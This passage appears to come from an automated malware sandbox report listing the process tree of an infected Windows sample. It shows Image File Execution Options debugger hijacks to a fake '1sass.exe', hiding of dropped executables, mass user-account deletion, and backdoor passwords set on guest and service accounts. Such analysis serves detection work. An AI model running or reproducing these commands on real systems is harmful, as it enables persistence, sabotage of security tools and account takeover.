- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\296702.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2612
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\296703.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:3044
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\se.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3012
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1066.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:3028
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\inf\delone.bat
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:1964
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\system32\chq.exe
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:760
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\system32\log.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2352
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\inf\line.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:764
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h whw.exe
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h chq.exe
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:2420
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h log.exe
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:788
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h iniquery.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2396
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\inf\svchost.exe
    3⤵
    - Sets file to hidden
    - Drops file in Windows directory
    - Views/modifies file attributes
    PID:1308
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\inf\whw.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:608
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\inf\log.exe
    3⤵
    - Sets file to hidden
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1748
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\inf\sql.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\help\1sass.exe
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1848
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\system32\whw.exe
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1744
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\inf\chq.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:880
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\inf\iniquery.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1756
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\inf\jc.bat
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2188
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\repair\1sass.exe
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2236
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\repair\whw.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1716
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\repair\sql.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1968
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\inf\NTSVC.ocx
    3⤵
    - Sets file to hidden
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2300
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windowssystem32\wins\delphi.exe
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2400
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\system32\spool\basic.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1592
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\system32\reg.exe
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1596
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\system32\sethc.exe
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:1588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\inf\stopexe.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1304
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\39.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1264
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ie.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:2024
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2272
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ck.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2184
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\8.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2680
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hacker.com.cn.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2700
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icesword.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2952
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iceswordcn.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2772
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\112.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2608
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\111.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:2304
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\x.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2728
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sysdown.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:2784
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rejoice.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:1300
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\2009.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:2244
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Se2009.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2288
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rejoice2009.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:2588
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cc.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    - System Location Discovery: System Language Discovery
    PID:2356
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WINDOWS.exe" /v debugger /t REG_SZ /d C:\Windows\repair\1sass.exe /f
    3⤵
    - Event Triggered Execution: Image File Execution Options Injection
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\inf\deluser.bat
  2⤵
  - Loads dropped DLL
  PID:2532
- - C:\Windows\SysWOW64\whw.exe
    whw user SQLAgentCmdExec /del
    3⤵
    - Executes dropped EXE
    PID:2004
- - C:\Windows\SysWOW64\whw.exe
    whw user hwenta /del
    3⤵
    - Executes dropped EXE
    PID:2856
- - C:\Windows\SysWOW64\whw.exe
    whw user BESAdmin /del
    3⤵
    - Executes dropped EXE
    PID:2504
- - C:\Windows\SysWOW64\whw.exe
    whw user ahmet /del
    3⤵
    - Executes dropped EXE
    PID:2196
- - C:\Windows\SysWOW64\whw.exe
    whw user hwenta /del
    3⤵
    - Executes dropped EXE
    PID:1932
- - C:\Windows\SysWOW64\whw.exe
    whw user BESAdmin /del
    3⤵
    - Executes dropped EXE
    PID:2848
- - C:\Windows\SysWOW64\whw.exe
    whw user ahmet /del
    3⤵
    - Executes dropped EXE
    PID:2720
- - C:\Windows\SysWOW64\whw.exe
    whw user guestss /del
    3⤵
    - Executes dropped EXE
    PID:2712
- - C:\Windows\SysWOW64\whw.exe
    whw user net$ /del
    3⤵
    - Executes dropped EXE
    PID:2776
- - C:\Windows\SysWOW64\whw.exe
    whw user ts /del
    3⤵
    - Executes dropped EXE
    PID:1352
- - C:\Windows\SysWOW64\whw.exe
    whw user admin! /del
    3⤵
    - Executes dropped EXE
    PID:2956
- - C:\Windows\SysWOW64\whw.exe
    whw user server /del
    3⤵
    - Executes dropped EXE
    PID:2812
- - C:\Windows\SysWOW64\whw.exe
    whw user help /de
    3⤵
    - Executes dropped EXE
    PID:2872
- - C:\Windows\SysWOW64\whw.exe
    whw user 1 /del
    3⤵
    - Executes dropped EXE
    PID:2708
- - C:\Windows\SysWOW64\whw.exe
    whw user lee /del
    3⤵
    - Executes dropped EXE
    PID:2768
- - C:\Windows\SysWOW64\whw.exe
    whw user skygon /de
    3⤵
    - Executes dropped EXE
    PID:2580
- - C:\Windows\SysWOW64\whw.exe
    whw user 8881 /de
    3⤵
    - Executes dropped EXE
    PID:2844
- - C:\Windows\SysWOW64\whw.exe
    whw user guest /del
    3⤵
    - Executes dropped EXE
    PID:2732
- - C:\Windows\SysWOW64\whw.exe
    whw user NetShowServices /de
    3⤵
    - Executes dropped EXE
    PID:1452
- - C:\Windows\SysWOW64\whw.exe
    whw user ASPNET /de
    3⤵
    - Executes dropped EXE
    PID:2576
- - C:\Windows\SysWOW64\whw.exe
    whw usetr SUPPORT_388945a0 /del
    3⤵
    - Executes dropped EXE
    PID:2508
- - C:\Windows\SysWOW64\whw.exe
    whw user guest /active:n
    3⤵
    - Executes dropped EXE
    PID:2572
- - C:\Windows\SysWOW64\whw.exe
    whw user guest /del
    3⤵
    - Executes dropped EXE
    PID:2604
- - C:\Windows\SysWOW64\whw.exe
    whw user guest ABCabc7804645
    3⤵
    - Executes dropped EXE
    PID:2796
- - C:\Windows\SysWOW64\whw.exe
    whw user NetShowServices /active:n
    3⤵
    - Executes dropped EXE
    PID:2316
- - C:\Windows\SysWOW64\whw.exe
    whw user NetShowServices /del
    3⤵
    - Executes dropped EXE
    PID:2380
- - C:\Windows\SysWOW64\whw.exe
    whw user NetShowServices ABCabc7804645
    3⤵
    - Executes dropped EXE
    PID:576
- - C:\Windows\SysWOW64\whw.exe
    whw user ASPNET /active:n
    3⤵
    - Executes dropped EXE
    PID:2460
- - C:\Windows\SysWOW64\whw.exe
    whw user ASPNET ABCabc7804645
    3⤵
    - Executes dropped EXE
    PID:308
- - C:\Windows\SysWOW64\whw.exe
    whw user NetShowServices /del
    3⤵
    - Executes dropped EXE
    PID:2028
- - C:\Windows\SysWOW64\whw.exe
    whw user SUPPORT_388945a0 /active:n
    3⤵
    - Executes dropped EXE
    PID:1712
- - C:\Windows\SysWOW64\whw.exe
    whw user SUPPORT_388945a0 /del
    3⤵
    - Executes dropped EXE
    PID:1608
- - C:\Windows\SysWOW64\whw.exe
    whw user SUPPORT_388945a0 ABCabc7804645
    3⤵
    - Executes dropped EXE
    PID:668
- - C:\Windows\SysWOW64\whw.exe
    whw user ADMINAA /del
    3⤵
    - Executes dropped EXE
    PID:1240
- - C:\Windows\SysWOW64\whw.exe
    whw user symantec /del
    3⤵
    - Executes dropped EXE
    PID:1640
- - C:\Windows\SysWOW64\whw.exe
    whw user long /del
    3⤵
    - Executes dropped EXE
    PID:1680
- - C:\Windows\SysWOW64\whw.exe
    whw user hack$ /del
    3⤵
    - Executes dropped EXE
    PID:1276
- - C:\Windows\SysWOW64\whw.exe
    whw user ASPNET$ /del
    3⤵
    - Executes dropped EXE
    PID:2628
- - C:\Windows\SysWOW64\whw.exe
    whw user userftp /del
    3⤵
    - Executes dropped EXE
    PID:1148
- - C:\Windows\SysWOW64\whw.exe
    whw user goest$ /del
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\whw.exe
    whw user zxcv /del
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\whw.exe
    whw user xiaoxin /del
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\whw.exe
    whw user wh /del
    3⤵
    PID:1996
- - C:\Windows\SysWOW64\whw.exe
    whw user VStart /del
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\whw.exe
    whw user sorry /del
    3⤵
    PID:2904
- - C:\Windows\SysWOW64\whw.exe
    whw user sky1987 /del
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\whw.exe
    whw user keke /del
    3⤵
    PID:2560
- - C:\Windows\SysWOW64\whw.exe
    whw user hao$ /del
    3⤵
    PID:3032
- - C:\Windows\SysWOW64\whw.exe
    whw user first /del
    3⤵
    PID:2612
- - C:\Windows\SysWOW64\whw.exe
    whw user Devil /del
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\whw.exe
    whw user anm2000 /del
    3⤵
    PID:2240
- - C:\Windows\SysWOW64\whw.exe
    whw user installer /del
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\whw.exe
    whw user jingcha110 /del
    3⤵
    PID:624
- - C:\Windows\SysWOW64\whw.exe
    whw user informix /del
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\whw.exe
    whw user sukiyob /del
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\whw.exe
    whw user net$ /del
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\whw.exe
    whw user pbjk /del
    3⤵
    PID:1200
- - C:\Windows\SysWOW64\whw.exe
    whw user softvig /del
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\whw.exe
    whw user tian33 /del
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\whw.exe
    whw user NetShowServices /del
    3⤵
    PID:836
- - C:\Windows\SysWOW64\whw.exe
    whw user add /del
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\whw.exe
    whw user admin /del
    3⤵
    PID:852
- - C:\Windows\SysWOW64\whw.exe
    whw user gcooper /del
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\whw.exe
    whw user killer$ /del
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\whw.exe
    whw user sourrj /del
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\whw.exe
    whw user sqluser /del
    3⤵
    PID:648
- - C:\Windows\SysWOW64\whw.exe
    whw user system32 /del
    3⤵
    PID:324
- - C:\Windows\SysWOW64\whw.exe
    whw user testxsi /del
    3⤵
    PID:912
- - C:\Windows\SysWOW64\whw.exe
    whw user sysadmin /del
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\whw.exe
    whw user slv /del
    3⤵
    PID:444
- - C:\Windows\SysWOW64\whw.exe
    whw user iis /del
    3⤵
    PID:700
- - C:\Windows\SysWOW64\whw.exe
    whw user sys /del
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\whw.exe
    whw user of$ /del
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\whw.exe
    whw user Mri /del
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\whw.exe
    whw user fabu /del
    3⤵
    PID:2136
- - C:\Windows\SysWOW64\whw.exe
    whw user ilaedes /del
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\whw.exe
    whw user of$ /del
    3⤵
    PID:764
- - C:\Windows\SysWOW64\whw.exe
    whw user IUSER_Admin /del
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\whw.exe
    whw user zzang2580woo /del
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\whw.exe
    whw user yang /del
    3⤵
    PID:788
- - C:\Windows\SysWOW64\whw.exe
    whw user jlewis /del
    3⤵
    PID:688
- - C:\Windows\SysWOW64\whw.exe
    whw user xiaoxin /del
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\whw.exe
    whw user first /del
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\whw.exe
    whw user admin$ /del
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\whw.exe
    whw user snowbead$ /del
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\whw.exe
    whw user teedy /del
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\whw.exe
    whw user TQ /del
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\whw.exe
    whw user TQ$ /del
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\whw.exe
    whw user zxcv /del
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\whw.exe
    whw user admi$ /del
    3⤵
    PID:2332
- - C:\Windows\SysWOW64\whw.exe
    whw user guset /del
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\whw.exe
    whw user s /del
    3⤵
    PID:2376
- - C:\Windows\SysWOW64\whw.exe
    whw user SUPPORT_388945a0 /del
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\whw.exe
    whw user systems /del
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\whw.exe
    whw user ASPNET /del
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\whw.exe
    whw user localhelper$ /del
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\whw.exe
    whw user ynh /del
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\whw.exe
    whw user how /del
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\whw.exe
    whw user sam /del
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\whw.exe
    whw user SQLAgentCmdExec /del
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\whw.exe
    whw user sqlguest /del
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\whw.exe
    whw user SUPPORT_388945a0 /del
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\whw.exe
    whw user pywl$ /del
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\whw.exe
    whw user smith /del
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\whw.exe
    whw user tent /del
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\whw.exe
    whw user webmsql /del
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\whw.exe
    whw user Conylee$ /del
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\whw.exe
    whw user tony /del
    3⤵
    PID:952
- - C:\Windows\SysWOW64\whw.exe
    whw user sa$ /del
    3⤵
    PID:2196
- - C:\Windows\SysWOW64\whw.exe
    whw user SQL$ /del
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\whw.exe
    whw user uiop /del
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\whw.exe
    whw user h8894526$ /del
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\whw.exe
    whw user qqadmin$ /del
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\whw.exe
    whw user zhu$ /del
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\whw.exe
    whw user mari /del
    3⤵
    PID:264
- - C:\Windows\SysWOW64\whw.exe
    whw user madmin$ /del
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\whw.exe
    whw user mike /del
    3⤵
    PID:2664
- - C:\Windows\SysWOW64\whw.exe
    whw user radmin$ /del
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\whw.exe
    whw user james /del
    3⤵
    PID:2840
- - C:\Windows\SysWOW64\whw.exe
    whw user ken /del
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\whw.exe
    whw user dtwwd$ /del
    3⤵
    PID:2776
- - C:\Windows\SysWOW64\whw.exe
    whw user edmin /del
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\whw.exe
    whw user guestss /del
    3⤵
    PID:2092
- - C:\Windows\SysWOW64\whw.exe
    whw user hejianhack$ /del
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\whw.exe
    whw user nicam0706 /del
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\whw.exe
    whw user cbooth /del
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\whw.exe
    whw user kmeyer /del
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\whw.exe
    whw user phillips /del
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\whw.exe
    whw user spitech /del
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\whw.exe
    whw user support /del
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\whw.exe
    whw user yuiop /del
    3⤵
    PID:1300
- - C:\Windows\SysWOW64\whw.exe
    whw user guest$ /del
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\whw.exe
    whw user system$ /del
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\whw.exe
    whw user iisadmin /del
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\whw.exe
    whw user ts /del
    3⤵
    PID:2736
- - C:\Windows\SysWOW64\whw.exe
    whw user admin /del
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\whw.exe
    whw user super /del
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\whw.exe
    whw user user /del
    3⤵
    PID:2604
- - C:\Windows\SysWOW64\whw.exe
    whw user net2$ /del
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\whw.exe
    whw user 123 /del
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\whw.exe
    whw user 123$ /del
    3⤵
    PID:3060
- - C:\Windows\SysWOW64\whw.exe
    whw user guests$ /del
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\whw.exe
    whw user smokin$ /del
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\whw.exe
    whw user new1 /del
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\whw.exe
    whw user hao$ /del
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\whw.exe
    whw user yi$ /del
    3⤵
    PID:1304
- - C:\Windows\SysWOW64\whw.exe
    whw user administretor /del
    3⤵
    PID:568
- - C:\Windows\SysWOW64\whw.exe
    whw user James /del
    3⤵
    PID:3048
- - C:\Windows\SysWOW64\whw.exe
    whw user kevin /del
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\whw.exe
    whw user Jenny /del
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\whw.exe
    whw user karen /del
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\whw.exe
    whw user krbtgt /del
    3⤵
    PID:308
- - C:\Windows\SysWOW64\whw.exe
    whw user yyse /del
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\whw.exe
    whw user yyse$ /del
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\whw.exe
    whw user sorry /del
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\whw.exe
    whw user hello /del
    3⤵
    PID:1992
- - C:\Windows\SysWOW64\whw.exe
    whw user fofo /del
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\whw.exe
    whw user aaa /del
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\whw.exe
    whw user qiqi$ /del
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\whw.exe
    whw user qiqia /del
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\whw.exe
    whw user yyse$ /del
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\whw.exe
    whw user SQL /del
    3⤵
    PID:1404
- C:\Windows\inf\IExp1orer.exe
  IExp1orer stop TlntSvr
  2⤵
  - Executes dropped EXE
  PID:2400
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\inf\deltow.bat
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:1552
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\system32\chq.exe
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:2428
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\system32\log.exe
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:776
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\inf\line.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2004
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h whw.exe
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2100
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h chq.exe
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2200
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h log.exe
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1976
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h iniquery.exe
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1636
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h C:\Windows\inf\svchost.exe
    3⤵
    - Sets file to hidden
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
